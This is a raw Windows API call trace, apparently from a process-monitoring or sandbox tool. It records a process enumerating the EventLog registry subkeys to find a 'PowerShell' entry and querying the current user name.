	[0351.128] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x0) returned 0x2
	[0351.129] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x330) returned 0x0
	[0351.129] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x0) returned 0x2
	[0351.129] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x338) returned 0x0
	[0351.129] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x0) returned 0x2
	[0351.129] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x33c) returned 0x0
	[0351.129] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x0) returned 0x2
	[0351.129] RegOpenKeyExW (in: hKey=0x308, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x340) returned 0x0
	[0351.129] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x0) returned 0x2
	[0351.129] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x344) returned 0x0
	[0351.129] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x0) returned 0x2
	[0351.129] RegOpenKeyExW (in: hKey=0x308, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x348) returned 0x0
	[0351.130] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x0) returned 0x2
	[0351.130] RegOpenKeyExW (in: hKey=0x308, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x34c) returned 0x0
	[0351.130] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2f8 | out: phkResult=0xcd2f8*=0x350) returned 0x0
	[0351.130] RegCloseKey (hKey=0x350) returned 0x0
	[0351.130] RegCloseKey (hKey=0x308) returned 0x0
	[0351.131] RegCloseKey (hKey=0x34c) returned 0x0
	[0351.141] CoTaskMemAlloc (cb=0x804) returned 0x2f0650
	[0351.142] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f0650, nSize=0xcd508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd508) returned 0x1
	[0351.413] CoTaskMemFree (pv=0x2f0650) 
	[0351.415] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.415] GetUserNameW (in: lpBuffer=0x309530, pcbBuffer=0xcd548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd548) returned 1
	[0351.415] CoTaskMemFree (pv=0x309530) 
	[0351.440] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd248 | out: phkResult=0xcd248*=0x354) returned 0x0
	[0351.440] RegQueryInfoKeyW (in: hKey=0x354, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.440] CoTaskMemFree (pv=0x0) 
	[0351.720] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.720] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x0, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.720] CoTaskMemFree (pv=0x309530) 
	[0351.720] CoTaskMemFree (pv=0x0) 
	[0351.720] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.720] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x1, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.720] CoTaskMemFree (pv=0x309530) 
	[0351.720] CoTaskMemFree (pv=0x0) 
	[0351.720] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.720] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.720] CoTaskMemFree (pv=0x309530) 
	[0351.720] CoTaskMemFree (pv=0x0) 
	[0351.720] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.720] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x3, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.720] CoTaskMemFree (pv=0x309530) 
	[0351.720] CoTaskMemFree (pv=0x0) 
	[0351.720] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.720] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x4, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.721] CoTaskMemFree (pv=0x309530) 
	[0351.721] CoTaskMemFree (pv=0x0) 
	[0351.721] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.721] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x5, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.721] CoTaskMemFree (pv=0x309530) 
	[0351.721] CoTaskMemFree (pv=0x0) 
	[0351.721] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.721] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x6, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.721] CoTaskMemFree (pv=0x309530) 
	[0351.721] CoTaskMemFree (pv=0x0) 
	[0351.721] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.721] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x7, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.721] CoTaskMemFree (pv=0x309530) 
	[0351.721] CoTaskMemFree (pv=0x0) 
	[0351.721] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.721] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x8, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.721] CoTaskMemFree (pv=0x309530) 
	[0351.721] CoTaskMemFree (pv=0x0) 
	[0351.721] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x2e4) returned 0x0
	[0351.722] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.722] RegOpenKeyExW (in: hKey=0x354, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x338) returned 0x0
	[0351.722] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.722] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x33c) returned 0x0
	[0351.722] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.722] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x340) returned 0x0
	[0351.722] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.722] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x344) returned 0x0
	[0351.722] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.722] RegOpenKeyExW (in: hKey=0x354, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x348) returned 0x0
	[0351.723] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.723] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x334) returned 0x0
	[0351.723] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.723] RegOpenKeyExW (in: hKey=0x354, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x304) returned 0x0
	[0351.723] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.723] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x30c) returned 0x0
	[0351.723] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x320) returned 0x0
	[0351.723] RegCloseKey (hKey=0x320) returned 0x0
	[0351.724] RegCloseKey (hKey=0x354) returned 0x0
	[0351.724] RegCloseKey (hKey=0x30c) returned 0x0
	[0351.725] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd248 | out: phkResult=0xcd248*=0x30c) returned 0x0
	[0351.725] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.725] CoTaskMemFree (pv=0x0) 
	[0351.725] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.725] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.725] CoTaskMemFree (pv=0x309530) 
	[0351.725] CoTaskMemFree (pv=0x0) 
	[0351.725] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.725] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.725] CoTaskMemFree (pv=0x309530) 
	[0351.725] CoTaskMemFree (pv=0x0) 
	[0351.725] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.725] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.725] CoTaskMemFree (pv=0x309530) 
	[0351.725] CoTaskMemFree (pv=0x0) 
	[0351.725] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.725] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.725] CoTaskMemFree (pv=0x309530) 
	[0351.725] CoTaskMemFree (pv=0x0) 
	[0351.725] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.725] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.725] CoTaskMemFree (pv=0x309530) 
	[0351.725] CoTaskMemFree (pv=0x0) 
	[0351.725] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.725] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.726] CoTaskMemFree (pv=0x309530) 
	[0351.726] CoTaskMemFree (pv=0x0) 
	[0351.726] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.726] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.726] CoTaskMemFree (pv=0x309530) 
	[0351.726] CoTaskMemFree (pv=0x0) 
	[0351.726] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.726] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.726] CoTaskMemFree (pv=0x309530) 
	[0351.726] CoTaskMemFree (pv=0x0) 
	[0351.726] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.726] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x309530, lpcchName=0xcd248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.726] CoTaskMemFree (pv=0x309530) 
	[0351.726] CoTaskMemFree (pv=0x0) 
	[0351.726] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x354) returned 0x0
	[0351.726] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.726] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x320) returned 0x0
	[0351.726] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.726] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x330) returned 0x0
	[0351.727] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.727] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x358) returned 0x0
	[0351.727] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.727] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x35c) returned 0x0
	[0351.727] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.727] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x360) returned 0x0
	[0351.727] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.727] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x364) returned 0x0
	[0351.727] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.728] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x368) returned 0x0
	[0351.728] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x0) returned 0x2
	[0351.728] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x36c) returned 0x0
	[0351.728] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd2a8 | out: phkResult=0xcd2a8*=0x370) returned 0x0
	[0351.728] RegCloseKey (hKey=0x370) returned 0x0
	[0351.728] RegCloseKey (hKey=0x30c) returned 0x0
	[0351.729] RegCloseKey (hKey=0x36c) returned 0x0
	[0351.729] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x36c) returned 0x0
	[0351.730] RegQueryInfoKeyW (in: hKey=0x36c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd18c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd188*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.730] CoTaskMemFree (pv=0x0) 
	[0351.730] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.730] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x0, lpName=0x309530, lpcchName=0xcd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.730] CoTaskMemFree (pv=0x309530) 
	[0351.730] CoTaskMemFree (pv=0x0) 
	[0351.730] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.730] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x1, lpName=0x309530, lpcchName=0xcd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.730] CoTaskMemFree (pv=0x309530) 
	[0351.730] CoTaskMemFree (pv=0x0) 
	[0351.730] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.730] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x2, lpName=0x309530, lpcchName=0xcd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.730] CoTaskMemFree (pv=0x309530) 
	[0351.730] CoTaskMemFree (pv=0x0) 
	[0351.730] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.730] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x3, lpName=0x309530, lpcchName=0xcd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.730] CoTaskMemFree (pv=0x309530) 
	[0351.730] CoTaskMemFree (pv=0x0) 
	[0351.730] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.730] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x4, lpName=0x309530, lpcchName=0xcd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.730] CoTaskMemFree (pv=0x309530) 
	[0351.730] CoTaskMemFree (pv=0x0) 
	[0351.730] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.730] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x5, lpName=0x309530, lpcchName=0xcd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.731] CoTaskMemFree (pv=0x309530) 
	[0351.731] CoTaskMemFree (pv=0x0) 
	[0351.731] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.731] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x6, lpName=0x309530, lpcchName=0xcd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.731] CoTaskMemFree (pv=0x309530) 
	[0351.731] CoTaskMemFree (pv=0x0) 
	[0351.731] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.731] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x7, lpName=0x309530, lpcchName=0xcd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.731] CoTaskMemFree (pv=0x309530) 
	[0351.731] CoTaskMemFree (pv=0x0) 
	[0351.731] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0351.731] RegEnumKeyExW (in: hKey=0x36c, dwIndex=0x8, lpName=0x309530, lpcchName=0xcd218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0351.731] CoTaskMemFree (pv=0x309530) 
	[0351.731] CoTaskMemFree (pv=0x0) 
	[0351.731] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x30c) returned 0x0
	[0351.731] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x0) returned 0x2
	[0351.731] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x370) returned 0x0
	[0351.731] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x0) returned 0x2
	[0351.732] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x374) returned 0x0
	[0351.732] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x0) returned 0x2
